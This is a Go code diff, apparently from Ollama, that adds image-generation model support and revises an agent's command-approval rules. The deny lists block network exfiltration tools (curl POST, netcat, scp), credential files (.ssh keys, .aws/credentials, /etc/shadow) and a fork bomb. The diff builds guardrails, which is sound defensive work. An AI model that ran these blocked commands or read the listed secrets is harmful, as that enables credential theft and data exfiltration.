"github.com/ollama/ollama/version"
|
||||
"github.com/ollama/ollama/x/imagegen/transfer"
|
||||
)
|
||||
|
||||
var (
|
||||
@@ -73,6 +74,11 @@ type Model struct {
|
||||
func (m *Model) Capabilities() []model.Capability {
|
||||
capabilities := []model.Capability{}
|
||||
|
||||
// Check for image generation model via config capabilities
|
||||
if slices.Contains(m.Config.Capabilities, "image") {
|
||||
return []model.Capability{model.CapabilityImageGeneration}
|
||||
}
|
||||
|
||||
// Check for completion capability
|
||||
if m.ModelPath != "" {
|
||||
f, err := gguf.Open(m.ModelPath)
|
||||
@@ -555,6 +561,24 @@ func PushModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
|
||||
layers = append(layers, manifest.Config)
|
||||
}
|
||||
|
||||
// Use fast transfer for models with tensor layers (many small blobs)
|
||||
if hasTensorLayers(layers) {
|
||||
// Read raw manifest JSON to preserve tensor metadata fields
|
||||
manifestPath, err := mp.GetManifestPath()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
manifestJSON, err := os.ReadFile(manifestPath)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if err := pushWithTransfer(ctx, mp, layers, manifestJSON, regOpts, fn); err != nil {
|
||||
return err
|
||||
}
|
||||
fn(api.ProgressResponse{Status: "success"})
|
||||
return nil
|
||||
}
|
||||
|
||||
for _, layer := range layers {
|
||||
if err := uploadBlob(ctx, mp, layer, regOpts, fn); err != nil {
|
||||
slog.Info(fmt.Sprintf("error uploading blob: %v", err))
|
||||
@@ -620,6 +644,15 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
|
||||
layers = append(layers, manifest.Config)
|
||||
}
|
||||
|
||||
// Use fast transfer for models with tensor layers (many small blobs)
|
||||
if hasTensorLayers(layers) {
|
||||
if err := pullWithTransfer(ctx, mp, layers, manifest, regOpts, fn); err != nil {
|
||||
return err
|
||||
}
|
||||
fn(api.ProgressResponse{Status: "success"})
|
||||
return nil
|
||||
}
|
||||
|
||||
skipVerify := make(map[string]bool)
|
||||
for _, layer := range layers {
|
||||
cacheHit, err := downloadBlob(ctx, downloadOpts{
|
||||
@@ -634,7 +667,6 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
|
||||
skipVerify[layer.Digest] = cacheHit
|
||||
delete(deleteMap, layer.Digest)
|
||||
}
|
||||
delete(deleteMap, manifest.Config.Digest)
|
||||
|
||||
fn(api.ProgressResponse{Status: "verifying sha256 digest"})
|
||||
for _, layer := range layers {
|
||||
@@ -643,13 +675,11 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
|
||||
}
|
||||
if err := verifyBlob(layer.Digest); err != nil {
|
||||
if errors.Is(err, errDigestMismatch) {
|
||||
// something went wrong, delete the blob
|
||||
fp, err := GetBlobsPath(layer.Digest)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if err := os.Remove(fp); err != nil {
|
||||
// log this, but return the original error
|
||||
slog.Info(fmt.Sprintf("couldn't remove file with digest mismatch '%s': %v", fp, err))
|
||||
}
|
||||
}
|
||||
@@ -657,6 +687,11 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
|
||||
}
|
||||
}
|
||||
|
||||
for _, layer := range layers {
|
||||
delete(deleteMap, layer.Digest)
|
||||
}
|
||||
delete(deleteMap, manifest.Config.Digest)
|
||||
|
||||
fn(api.ProgressResponse{Status: "writing manifest"})
|
||||
|
||||
manifestJSON, err := json.Marshal(manifest)
|
||||
@@ -690,6 +725,148 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
|
||||
return nil
|
||||
}
|
||||
|
||||
// hasTensorLayers checks if any layer has tensor media type.
|
||||
func hasTensorLayers(layers []Layer) bool {
|
||||
for _, layer := range layers {
|
||||
if layer.MediaType == MediaTypeImageTensor {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// pullWithTransfer uses the simplified x/transfer package for downloading blobs.
|
||||
func pullWithTransfer(ctx context.Context, mp ModelPath, layers []Layer, manifest *Manifest, regOpts *registryOptions, fn func(api.ProgressResponse)) error {
|
||||
blobs := make([]transfer.Blob, len(layers))
|
||||
for i, layer := range layers {
|
||||
blobs[i] = transfer.Blob{
|
||||
Digest: layer.Digest,
|
||||
Size: layer.Size,
|
||||
}
|
||||
}
|
||||
|
||||
destDir, err := GetBlobsPath("")
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
base := mp.BaseURL()
|
||||
if base.Scheme != "http" && regOpts != nil && regOpts.Insecure {
|
||||
base.Scheme = "http"
|
||||
}
|
||||
baseURL := base.String()
|
||||
|
||||
var totalSize int64
|
||||
for _, blob := range blobs {
|
||||
totalSize += blob.Size
|
||||
}
|
||||
|
||||
progress := func(completed, total int64) {
|
||||
fn(api.ProgressResponse{
|
||||
Status: "pulling model",
|
||||
Digest: "sha256:model",
|
||||
Total: total,
|
||||
Completed: completed,
|
||||
})
|
||||
}
|
||||
|
||||
getToken := func(ctx context.Context, challenge transfer.AuthChallenge) (string, error) {
|
||||
return getAuthorizationToken(ctx, registryChallenge{
|
||||
Realm: challenge.Realm,
|
||||
Service: challenge.Service,
|
||||
Scope: challenge.Scope,
|
||||
})
|
||||
}
|
||||
|
||||
if err := transfer.Download(ctx, transfer.DownloadOptions{
|
||||
Blobs: blobs,
|
||||
BaseURL: baseURL,
|
||||
DestDir: destDir,
|
||||
Repository: mp.GetNamespaceRepository(),
|
||||
Progress: progress,
|
||||
Token: regOpts.Token,
|
||||
GetToken: getToken,
|
||||
Logger: slog.Default(),
|
||||
}); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Write manifest
|
||||
fn(api.ProgressResponse{Status: "writing manifest"})
|
||||
manifestJSON, err := json.Marshal(manifest)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
fp, err := mp.GetManifestPath()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if err := os.MkdirAll(filepath.Dir(fp), 0o755); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return os.WriteFile(fp, manifestJSON, 0o644)
|
||||
}
|
||||
|
||||
// pushWithTransfer uses the simplified x/transfer package for uploading blobs and manifest.
|
||||
func pushWithTransfer(ctx context.Context, mp ModelPath, layers []Layer, manifestJSON []byte, regOpts *registryOptions, fn func(api.ProgressResponse)) error {
|
||||
blobs := make([]transfer.Blob, len(layers))
|
||||
for i, layer := range layers {
|
||||
blobs[i] = transfer.Blob{
|
||||
Digest: layer.Digest,
|
||||
Size: layer.Size,
|
||||
From: layer.From,
|
||||
}
|
||||
}
|
||||
|
||||
srcDir, err := GetBlobsPath("")
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
base := mp.BaseURL()
|
||||
if base.Scheme != "http" && regOpts != nil && regOpts.Insecure {
|
||||
base.Scheme = "http"
|
||||
}
|
||||
baseURL := base.String()
|
||||
|
||||
var totalSize int64
|
||||
for _, blob := range blobs {
|
||||
totalSize += blob.Size
|
||||
}
|
||||
|
||||
progress := func(completed, total int64) {
|
||||
fn(api.ProgressResponse{
|
||||
Status: "pushing model",
|
||||
Digest: "sha256:model",
|
||||
Total: total,
|
||||
Completed: completed,
|
||||
})
|
||||
}
|
||||
|
||||
getToken := func(ctx context.Context, challenge transfer.AuthChallenge) (string, error) {
|
||||
return getAuthorizationToken(ctx, registryChallenge{
|
||||
Realm: challenge.Realm,
|
||||
Service: challenge.Service,
|
||||
Scope: challenge.Scope,
|
||||
})
|
||||
}
|
||||
|
||||
return transfer.Upload(ctx, transfer.UploadOptions{
|
||||
Blobs: blobs,
|
||||
BaseURL: baseURL,
|
||||
SrcDir: srcDir,
|
||||
Progress: progress,
|
||||
Token: regOpts.Token,
|
||||
GetToken: getToken,
|
||||
Logger: slog.Default(),
|
||||
Manifest: manifestJSON,
|
||||
ManifestRef: mp.Tag,
|
||||
Repository: mp.GetNamespaceRepository(),
|
||||
})
|
||||
}
|
||||
|
||||
func pullModelManifest(ctx context.Context, mp ModelPath, regOpts *registryOptions) (*Manifest, error) {
|
||||
requestURL := mp.BaseURL().JoinPath("v2", mp.GetNamespaceRepository(), "manifests", mp.Tag)
|
||||
|
||||
|
||||
@@ -47,6 +47,15 @@ func TestModelCapabilities(t *testing.T) {
|
||||
model Model
|
||||
expectedCaps []model.Capability
|
||||
}{
|
||||
{
|
||||
name: "model with image generation capability via config",
|
||||
model: Model{
|
||||
Config: model.ConfigV2{
|
||||
Capabilities: []string{"image"},
|
||||
},
|
||||
},
|
||||
expectedCaps: []model.Capability{model.CapabilityImageGeneration},
|
||||
},
|
||||
{
|
||||
name: "model with completion capability",
|
||||
model: Model{
|
||||
|
||||
@@ -13,9 +13,14 @@ type Layer struct {
|
||||
Digest string `json:"digest"`
|
||||
Size int64 `json:"size"`
|
||||
From string `json:"from,omitempty"`
|
||||
Name string `json:"name,omitempty"` // tensor name, e.g., "text_encoder/model.embed_tokens.weight"
|
||||
status string
|
||||
}
|
||||
|
||||
const (
|
||||
MediaTypeImageTensor = "application/vnd.ollama.image.tensor"
|
||||
)
|
||||
|
||||
func NewLayer(r io.Reader, mediatype string) (Layer, error) {
|
||||
blobs, err := GetBlobsPath("")
|
||||
if err != nil {
|
||||
|
||||
@@ -50,6 +50,8 @@ import (
|
||||
"github.com/ollama/ollama/types/errtypes"
|
||||
"github.com/ollama/ollama/types/model"
|
||||
"github.com/ollama/ollama/version"
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
imagegenapi "github.com/ollama/ollama/x/imagegen/api"
|
||||
)
|
||||
|
||||
const signinURLStr = "https://ollama.com/connect?name=%s&key=%s"
|
||||
@@ -162,6 +164,29 @@ func (s *Server) scheduleRunner(ctx context.Context, name string, caps []model.C
|
||||
return runner.llama, model, &opts, nil
|
||||
}
|
||||
|
||||
// ScheduleImageGenRunner schedules an image generation model runner.
|
||||
// This implements the imagegenapi.RunnerScheduler interface.
|
||||
func (s *Server) ScheduleImageGenRunner(c *gin.Context, modelName string, opts api.Options, keepAlive *api.Duration) (llm.LlamaServer, error) {
|
||||
m := &Model{
|
||||
Name: modelName,
|
||||
ShortName: modelName,
|
||||
ModelPath: modelName, // For image gen, ModelPath is just the model name
|
||||
Config: model.ConfigV2{
|
||||
Capabilities: []string{"image"},
|
||||
},
|
||||
}
|
||||
|
||||
runnerCh, errCh := s.sched.GetRunner(c.Request.Context(), m, opts, keepAlive)
|
||||
var runner *runnerRef
|
||||
select {
|
||||
case runner = <-runnerCh:
|
||||
case err := <-errCh:
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return runner.llama, nil
|
||||
}
|
||||
|
||||
func signinURL() (string, error) {
|
||||
pubKey, err := auth.GetPublicKey()
|
||||
if err != nil {
|
||||
@@ -189,6 +214,12 @@ func (s *Server) GenerateHandler(c *gin.Context) {
|
||||
return
|
||||
}
|
||||
|
||||
// Check if this is a known image generation model
|
||||
if imagegen.ResolveModelName(req.Model) != "" {
|
||||
imagegenapi.HandleGenerateRequest(c, s, req.Model, req.Prompt, req.KeepAlive, streamResponse)
|
||||
return
|
||||
}
|
||||
|
||||
name := model.ParseName(req.Model)
|
||||
if !name.IsValid() {
|
||||
// Ideally this is "invalid model name" but we're keeping with
|
||||
@@ -1544,6 +1575,12 @@ func (s *Server) GenerateRoutes(rc *ollama.Registry) (http.Handler, error) {
|
||||
r.GET("/v1/models/:model", middleware.RetrieveMiddleware(), s.ShowHandler)
|
||||
r.POST("/v1/responses", middleware.ResponsesMiddleware(), s.ChatHandler)
|
||||
|
||||
// Inference (Anthropic compatibility)
|
||||
r.POST("/v1/messages", middleware.AnthropicMessagesMiddleware(), s.ChatHandler)
|
||||
|
||||
// Experimental image generation support
|
||||
imagegenapi.RegisterRoutes(r, s)
|
||||
|
||||
if rc != nil {
|
||||
// wrap old with new
|
||||
rs := ®istry.Local{
|
||||
|
||||
@@ -21,6 +21,7 @@ import (
|
||||
"github.com/ollama/ollama/logutil"
|
||||
"github.com/ollama/ollama/ml"
|
||||
"github.com/ollama/ollama/types/model"
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
)
|
||||
|
||||
type LlmRequest struct {
|
||||
@@ -194,6 +195,14 @@ func (s *Scheduler) processPending(ctx context.Context) {
|
||||
slog.Debug("updating default concurrency", "OLLAMA_MAX_LOADED_MODELS", maxRunners, "gpu_count", len(gpus))
|
||||
}
|
||||
|
||||
// Check for image generation model before attempting GGML load
|
||||
if slices.Contains(pending.model.Config.Capabilities, "image") {
|
||||
if s.loadImageGen(pending) {
|
||||
break
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
// Load model for fitting
|
||||
logutil.Trace("loading model metadata", "model", pending.model.ModelPath)
|
||||
ggml, err := llm.LoadModel(pending.model.ModelPath, 1024)
|
||||
@@ -543,6 +552,48 @@ iGPUScan:
|
||||
return false
|
||||
}
|
||||
|
||||
// loadImageGen loads an image generation model.
|
||||
func (s *Scheduler) loadImageGen(req *LlmRequest) bool {
|
||||
// Use model name for imagegen (it resolves manifests by name, not file path)
|
||||
modelName := req.model.ShortName
|
||||
server, err := imagegen.NewServer(modelName)
|
||||
if err != nil {
|
||||
req.errCh <- err
|
||||
return true
|
||||
}
|
||||
|
||||
sessionDuration := envconfig.KeepAlive()
|
||||
if req.sessionDuration != nil {
|
||||
sessionDuration = req.sessionDuration.Duration
|
||||
}
|
||||
|
||||
runner := &runnerRef{
|
||||
model: req.model,
|
||||
modelPath: req.model.ModelPath,
|
||||
llama: server,
|
||||
Options: &req.opts,
|
||||
loading: false,
|
||||
sessionDuration: sessionDuration,
|
||||
refCount: 1,
|
||||
}
|
||||
|
||||
s.loadedMu.Lock()
|
||||
s.loaded[req.model.ModelPath] = runner
|
||||
s.loadedMu.Unlock()
|
||||
|
||||
// Set up expiration timer
|
||||
runner.refMu.Lock()
|
||||
if sessionDuration > 0 {
|
||||
runner.expireTimer = time.AfterFunc(sessionDuration, func() {
|
||||
s.expiredCh <- runner
|
||||
})
|
||||
}
|
||||
runner.refMu.Unlock()
|
||||
|
||||
req.useLoadedRunner(runner, s.finishedReqCh)
|
||||
return true
|
||||
}
|
||||
|
||||
func (s *Scheduler) updateFreeSpace(allGpus []ml.DeviceInfo) {
|
||||
if len(allGpus) == 0 {
|
||||
return
|
||||
|
||||
@@ -6,6 +6,7 @@ import (
|
||||
"errors"
|
||||
"log/slog"
|
||||
"os"
|
||||
"slices"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
@@ -16,6 +17,7 @@ import (
|
||||
"github.com/ollama/ollama/fs/ggml"
|
||||
"github.com/ollama/ollama/llm"
|
||||
"github.com/ollama/ollama/ml"
|
||||
"github.com/ollama/ollama/types/model"
|
||||
)
|
||||
|
||||
func TestMain(m *testing.M) {
|
||||
@@ -804,3 +806,61 @@ func (s *mockLlm) GetPort() int { return -
|
||||
func (s *mockLlm) GetDeviceInfos(ctx context.Context) []ml.DeviceInfo { return nil }
|
||||
func (s *mockLlm) HasExited() bool { return false }
|
||||
func (s *mockLlm) GetActiveDeviceIDs() []ml.DeviceID { return nil }
|
||||
|
||||
// TestImageGenCapabilityDetection verifies that models with "image" capability
|
||||
// are correctly identified and routed differently from language models.
|
||||
func TestImageGenCapabilityDetection(t *testing.T) {
|
||||
// Model with image capability should be detected
|
||||
imageModel := &Model{
|
||||
Config: model.ConfigV2{
|
||||
Capabilities: []string{"image"},
|
||||
},
|
||||
}
|
||||
require.True(t, slices.Contains(imageModel.Config.Capabilities, "image"))
|
||||
|
||||
// Model without image capability should not be detected
|
||||
langModel := &Model{
|
||||
Config: model.ConfigV2{
|
||||
Capabilities: []string{"completion"},
|
||||
},
|
||||
}
|
||||
require.False(t, slices.Contains(langModel.Config.Capabilities, "image"))
|
||||
|
||||
// Empty capabilities should not match
|
||||
emptyModel := &Model{}
|
||||
require.False(t, slices.Contains(emptyModel.Config.Capabilities, "image"))
|
||||
}
|
||||
|
||||
// TestImageGenRunnerCanBeEvicted verifies that an image generation model
|
||||
// loaded in the scheduler can be evicted by a language model request.
|
||||
func TestImageGenRunnerCanBeEvicted(t *testing.T) {
|
||||
ctx, done := context.WithTimeout(t.Context(), 500*time.Millisecond)
|
||||
defer done()
|
||||
|
||||
s := InitScheduler(ctx)
|
||||
s.getGpuFn = getGpuFn
|
||||
s.getSystemInfoFn = getSystemInfoFn
|
||||
|
||||
// Simulate an image gen runner already loaded
|
||||
imageGenRunner := &runnerRef{
|
||||
model: &Model{Name: "z-image", ModelPath: "/fake/image/model"},
|
||||
modelPath: "/fake/image/model",
|
||||
llama: &mockLlm{vramSize: 21 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{}},
|
||||
sessionDuration: 5 * time.Millisecond,
|
||||
refCount: 0, // idle
|
||||
}
|
||||
|
||||
s.loadedMu.Lock()
|
||||
s.loaded["/fake/image/model"] = imageGenRunner
|
||||
s.loadedMu.Unlock()
|
||||
|
||||
// Verify the image gen runner is loaded
|
||||
s.loadedMu.Lock()
|
||||
require.Len(t, s.loaded, 1)
|
||||
s.loadedMu.Unlock()
|
||||
|
||||
// findRunnerToUnload should find the idle image gen runner
|
||||
runner := s.findRunnerToUnload()
|
||||
require.NotNil(t, runner)
|
||||
require.Equal(t, "/fake/image/model", runner.modelPath)
|
||||
}
|
||||
|
||||
@@ -3,12 +3,13 @@ package model
|
||||
type Capability string
|
||||
|
||||
const (
|
||||
CapabilityCompletion = Capability("completion")
|
||||
CapabilityTools = Capability("tools")
|
||||
CapabilityInsert = Capability("insert")
|
||||
CapabilityVision = Capability("vision")
|
||||
CapabilityEmbedding = Capability("embedding")
|
||||
CapabilityThinking = Capability("thinking")
|
||||
CapabilityCompletion = Capability("completion")
|
||||
CapabilityTools = Capability("tools")
|
||||
CapabilityInsert = Capability("insert")
|
||||
CapabilityVision = Capability("vision")
|
||||
CapabilityEmbedding = Capability("embedding")
|
||||
CapabilityThinking = Capability("thinking")
|
||||
CapabilityImageGeneration = Capability("image")
|
||||
)
|
||||
|
||||
func (c Capability) String() string {
|
||||
|
||||
@@ -70,6 +70,9 @@ var autoAllowCommands = map[string]bool{
|
||||
// autoAllowPrefixes are command prefixes that are always allowed.
|
||||
// These are read-only or commonly-needed development commands.
|
||||
var autoAllowPrefixes = []string{
|
||||
// Git read-only
|
||||
"git status", "git log", "git diff", "git branch", "git show",
|
||||
"git remote -v", "git tag", "git stash list",
|
||||
// Package managers - run scripts
|
||||
"npm run", "npm test", "npm start",
|
||||
"bun run", "bun test",
|
||||
@@ -88,9 +91,6 @@ var autoAllowPrefixes = []string{
|
||||
}
|
||||
|
||||
// denyPatterns are dangerous command patterns that are always blocked.
|
||||
// NOTE: Some network patterns (curl POST, scp, rsync) moved to warnPatterns
|
||||
// to allow user escalation with explicit approval.
|
||||
// These patterns use word boundary matching to avoid false positives (e.g., "nc " won't match "rsync").
|
||||
var denyPatterns = []string{
|
||||
// Destructive commands
|
||||
"rm -rf", "rm -fr",
|
||||
@@ -101,8 +101,19 @@ var denyPatterns = []string{
|
||||
"sudo ", "su ", "doas ",
|
||||
"chmod 777", "chmod -R 777",
|
||||
"chown ", "chgrp ",
|
||||
// Network tools (raw sockets - still blocked)
|
||||
// Network exfiltration
|
||||
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
|
||||
"wget --post",
|
||||
"nc ", "netcat ",
|
||||
"scp ", "rsync ",
|
||||
// History and credentials
|
||||
"history",
|
||||
".bash_history", ".zsh_history",
|
||||
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
|
||||
".ssh/config",
|
||||
".aws/credentials", ".aws/config",
|
||||
".gnupg/",
|
||||
"/etc/shadow", "/etc/passwd",
|
||||
// Dangerous patterns
|
||||
":(){ :|:& };:", // fork bomb
|
||||
"chmod +s", // setuid
|
||||
@@ -110,20 +121,11 @@ var denyPatterns = []string{
|
||||
}
|
||||
|
||||
// denyPathPatterns are file patterns that should never be accessed.
|
||||
// These are checked using simple substring matching.
|
||||
// These are checked as exact filename matches or path suffixes.
|
||||
var denyPathPatterns = []string{
|
||||
// History files
|
||||
"history",
|
||||
".bash_history", ".zsh_history",
|
||||
// SSH keys and config
|
||||
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
|
||||
".ssh/config",
|
||||
// Cloud credentials
|
||||
".aws/credentials", ".aws/config",
|
||||
".gnupg/",
|
||||
// System credentials
|
||||
"/etc/shadow", "/etc/passwd",
|
||||
// Secrets files
|
||||
".env",
|
||||
".env.local",
|
||||
".env.production",
|
||||
"credentials.json",
|
||||
"secrets.json",
|
||||
"secrets.yaml",
|
||||
@@ -132,25 +134,6 @@ var denyPathPatterns = []string{
|
||||
".key",
|
||||
}
|
||||
|
||||
// warnPatterns are patterns that require explicit approval with warning.
|
||||
// These are potentially risky but legitimate in some contexts.
|
||||
// Unlike denyPatterns, these show a warning but allow user approval.
|
||||
var warnPatterns = []string{
|
||||
// Network operations (user may need for legitimate API testing)
|
||||
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
|
||||
"wget --post",
|
||||
// File transfer (user may need for deployments)
|
||||
"scp ", "rsync ",
|
||||
}
|
||||
|
||||
// warnPathPatterns are file patterns that require explicit approval with warning.
|
||||
// Unlike denyPathPatterns, these show a warning but allow user approval.
|
||||
var warnPathPatterns = []string{
|
||||
".env",
|
||||
".env.local",
|
||||
".env.production",
|
||||
}
|
||||
|
||||
// ApprovalManager manages tool execution approvals.
|
||||
type ApprovalManager struct {
|
||||
allowlist map[string]bool // exact matches
|
||||
@@ -193,8 +176,7 @@ func IsDenied(command string) (bool, string) {
|
||||
|
||||
// Check deny patterns
|
||||
for _, pattern := range denyPatterns {
|
||||
patternLower := strings.ToLower(pattern)
|
||||
if containsWord(commandLower, patternLower) {
|
||||
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||
return true, pattern
|
||||
}
|
||||
}
|
||||
@@ -209,57 +191,6 @@ func IsDenied(command string) (bool, string) {
|
||||
return false, ""
|
||||
}
|
||||
|
||||
// containsWord checks if a command contains a pattern as a word/command.
|
||||
// This handles patterns like "nc " which should match "nc -l 8080" but not "rsync -avz".
|
||||
// The pattern is considered a match if:
|
||||
// - It appears at the start of the command, OR
|
||||
// - It's preceded by a space, pipe, semicolon, or other delimiter
|
||||
func containsWord(command, pattern string) bool {
|
||||
// Simple contains check first
|
||||
if !strings.Contains(command, pattern) {
|
||||
return false
|
||||
}
|
||||
|
||||
// Check if pattern is at the start
|
||||
if strings.HasPrefix(command, pattern) {
|
||||
return true
|
||||
}
|
||||
|
||||
// Check if pattern is preceded by a delimiter (space, pipe, semicolon, &, etc.)
|
||||
delimiters := []string{" ", "|", ";", "&", "(", "`", "$"}
|
||||
for _, delim := range delimiters {
|
||||
if strings.Contains(command, delim+pattern) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// IsWarn checks if a bash command matches warning patterns.
|
||||
// These are patterns that require explicit user approval with a warning,
|
||||
// but are not completely blocked like deny patterns.
|
||||
// Returns true and the matched pattern if it should warn.
|
||||
func IsWarn(command string) (bool, string) {
|
||||
commandLower := strings.ToLower(command)
|
||||
|
||||
// Check warn patterns
|
||||
for _, pattern := range warnPatterns {
|
||||
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||
return true, pattern
|
||||
}
|
||||
}
|
||||
|
||||
// Check warn path patterns
|
||||
for _, pattern := range warnPathPatterns {
|
||||
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||
return true, pattern
|
||||
}
|
||||
}
|
||||
|
||||
return false, ""
|
||||
}
|
||||
|
||||
// FormatDeniedResult returns the tool result message when a command is blocked.
|
||||
func FormatDeniedResult(command string, pattern string) string {
|
||||
return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
|
||||
@@ -267,7 +198,6 @@ func FormatDeniedResult(command string, pattern string) string {
|
||||
|
||||
// extractBashPrefix extracts a prefix pattern from a bash command.
|
||||
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
|
||||
// For git commands like "git log x/agent/", returns "git log:x/agent/" (includes subcommand)
|
||||
// For commands without path args, returns empty string.
|
||||
// Paths with ".." traversal that escape the base directory return empty string for security.
|
||||
func extractBashPrefix(command string) string {
|
||||
@@ -289,30 +219,12 @@ func extractBashPrefix(command string) string {
|
||||
"less": true, "more": true, "file": true, "wc": true,
|
||||
"grep": true, "find": true, "tree": true, "stat": true,
|
||||
"sed": true,
|
||||
"git": true, // git commands with path args (e.g., git log x/agent/)
|
||||
}
|
||||
|
||||
if !safeCommands[baseCmd] {
|
||||
return ""
|
||||
}
|
||||
|
||||
// For git commands, extract the subcommand for more granular allowlisting
|
||||
var subCmd string
|
||||
if baseCmd == "git" && len(fields) >= 2 {
|
||||
// Git subcommand is the second field (e.g., "log", "status", "diff")
|
||||
// Skip options like "-v" - the first non-option argument is the subcommand
|
||||
for _, arg := range fields[1:] {
|
||||
if !strings.HasPrefix(arg, "-") {
|
||||
subCmd = arg
|
||||
break
|
||||
}
|
||||
}
|
||||
// If no subcommand found (unlikely for git), use empty string
|
||||
if subCmd == "" {
|
||||
subCmd = "unknown"
|
||||
}
|
||||
}
|
||||
|
||||
// Find the first path-like argument (must contain / or \ or start with .)
|
||||
// First pass: look for clear paths (containing path separators or starting with .)
|
||||
for _, arg := range fields[1:] {
|
||||
@@ -324,10 +236,6 @@ func extractBashPrefix(command string) string {
|
||||
if isNumeric(arg) {
|
||||
continue
|
||||
}
|
||||
// For git, skip the subcommand itself when looking for paths
|
||||
if baseCmd == "git" && arg == subCmd {
|
||||
continue
|
||||
}
|
||||
// Only process if it looks like a path (contains / or \ or starts with .)
|
||||
if !strings.Contains(arg, "/") && !strings.Contains(arg, "\\") && !strings.HasPrefix(arg, ".") {
|
||||
continue
|
||||
@@ -369,13 +277,6 @@ func extractBashPrefix(command string) string {
|
||||
dir = path.Dir(cleaned)
|
||||
}
|
||||
|
||||
// Build prefix with subcommand for git, or just baseCmd for others
|
||||
if baseCmd == "git" {
|
||||
if dir == "." {
|
||||
return fmt.Sprintf("git %s:./", subCmd)
|
||||
}
|
||||
return fmt.Sprintf("git %s:%s/", subCmd, dir)
|
||||
}
|
||||
if dir == "." {
|
||||
return fmt.Sprintf("%s:./", baseCmd)
|
||||
}
|
||||
@@ -383,7 +284,6 @@ func extractBashPrefix(command string) string {
|
||||
}
|
||||
|
||||
// Second pass: if no clear path found, use the first non-flag argument as a filename
|
||||
// For git, we still allow ./ prefix even without path args (git status, git stash, etc.)
|
||||
for _, arg := range fields[1:] {
|
||||
if strings.HasPrefix(arg, "-") {
|
||||
continue
|
||||
@@ -391,12 +291,6 @@ func extractBashPrefix(command string) string {
|
||||
if isNumeric(arg) {
|
||||
continue
|
||||
}
|
||||
// For git, skip the subcommand when checking for path args
|
||||
if baseCmd == "git" && arg == subCmd {
|
||||
// Git commands without path args (git status, git stash, etc.)
|
||||
// Still return a prefix with subcommand and current directory
|
||||
return fmt.Sprintf("git %s:./", subCmd)
|
||||
}
|
||||
// Treat as filename in current dir
|
||||
return fmt.Sprintf("%s:./", baseCmd)
|
||||
}
|
||||
@@ -600,37 +494,24 @@ func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any)
|
||||
// This prevents buffered input from causing double-press issues
|
||||
flushStdin(fd)
|
||||
|
||||
// Check if bash command should show warning
|
||||
// Warning is shown for: commands outside cwd, or commands matching warn patterns
|
||||
isWarning := false
|
||||
var warningMsg string
|
||||
var allowlistInfo string
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
// Check for outside cwd warning
|
||||
if isCommandOutsideCwd(cmd) {
|
||||
isWarning = true
|
||||
warningMsg = "command targets paths outside project"
|
||||
}
|
||||
// Check for warn patterns (curl POST, scp, rsync, .env files)
|
||||
if warned, pattern := IsWarn(cmd); warned {
|
||||
isWarning = true
|
||||
warningMsg = fmt.Sprintf("matches warning pattern: %s", pattern)
|
||||
}
|
||||
// Generate allowlist info for display
|
||||
prefix := extractBashPrefix(cmd)
|
||||
if prefix != "" {
|
||||
// Parse prefix format "cmd:path/" into command and directory
|
||||
if prefix := extractBashPrefix(cmd); prefix != "" {
|
||||
colonIdx := strings.Index(prefix, ":")
|
||||
if colonIdx != -1 {
|
||||
cmdName := prefix[:colonIdx]
|
||||
dirPath := prefix[colonIdx+1:]
|
||||
// Include "(includes subdirs)" for directories that allow hierarchical matching
|
||||
// ./ is special - it only allows files in current dir, not subdirs
|
||||
if dirPath != "./" {
|
||||
allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory (includes subdirs)", cmdName, dirPath)
|
||||
allowlistInfo = fmt.Sprintf("%s in %s directory (includes subdirs)", cmdName, dirPath)
|
||||
} else {
|
||||
allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory", cmdName, dirPath)
|
||||
allowlistInfo = fmt.Sprintf("%s in %s directory", cmdName, dirPath)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -712,7 +593,7 @@ type selectorState struct {
|
||||
denyReason string // deny reason (always visible in box)
|
||||
isWarning bool // true if command has warning
|
||||
warningMessage string // dynamic warning message to display
|
||||
allowlistInfo string // show what will be allowlisted (for "Always allow" option)
|
||||
allowlistInfo string // show what will be allowlisted (for "Allow for this session" option)
|
||||
}
|
||||
|
||||
// runSelector runs the interactive selector and returns the selected index and optional deny reason.
|
||||
@@ -926,11 +807,9 @@ func renderSelectorBox(state *selectorState) {
|
||||
// Blank line separator
|
||||
fmt.Fprintf(os.Stderr, "\033[K\r\n")
|
